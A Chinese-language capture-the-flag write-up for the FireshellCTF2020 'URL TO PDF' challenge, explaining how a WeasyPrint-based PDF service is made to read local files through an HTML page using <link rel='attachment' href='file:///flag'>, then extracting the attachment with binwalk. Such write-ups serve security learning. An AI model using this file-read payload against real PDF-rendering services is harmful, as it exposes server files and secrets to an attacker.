[FireshellCTF2020]URL TO PDF

这个题目的前端和[FireshellCTF2020]ScreenShooter好相似,填写一个url,会返回一个pdf,上个题目是返回的图片

这东西应该也是和爬虫相关的,让靶机去访问vps的7777端口,监听查看请求

在这里插入图片描述

发现是WeasyPrint

WeasyPrint

WeasyPrint是一个用于HTML和CSS的可视化渲染引擎,可以将HTML文档导出为打印标准的PDF文件

引用文章:我的费用报告导致 Lyft 上的服务器端请求伪造 (SSRF) — Nahamsec

WeasyPrint重新定义了一组html标签,包括img,embed,object等。根据我们之前的测试,我们已经知道javascript不是利用这一点的选项。在这一点上,我们的希望很低,我们开始认为PDF生成器不再可利用,直到我们发现对<链接>内部的几个文件的引用,包括pdf.py。这使我们能够通过使用 将任何网页或本地文件的内容附加到我们的 PDF 中。<link rel=attachment href="file:///root/secret.txt">

根据这个写index.html

<!DOCTYPE html>
<html>
<head>
<title>cai</title>
</head>
<body>

<link rel = "attachment" href = "file:///flag">
</body>
</html>

下载得到pdf文件,然后用binwalk分开

因为我使用的是root用户,所以使用如下命令

binwalk -e d0ee710813f87df641cd74b3ffec0c04.pdf --run-as=root

在这里插入图片描述

参考链接

  1. [FireshellCTF2020]web wp | Z3ratu1’s blog
  2. 我的费用报告导致 Lyft 上的服务器端请求伪造 (SSRF) — Nahamsec
  3. Binwalk工具的安装_子曰小玖的博客-CSDN博客_binwalk安装
  4. setuptools · PyPI
  5. python:ImportError: No module named ‘setuptools’_零境交错-CSDN博客
Logo

华为开发者空间,是为全球开发者打造的专属开发空间,汇聚了华为优质开发资源及工具,致力于让每一位开发者拥有一台云主机,基于华为根生态开发、创新。

更多推荐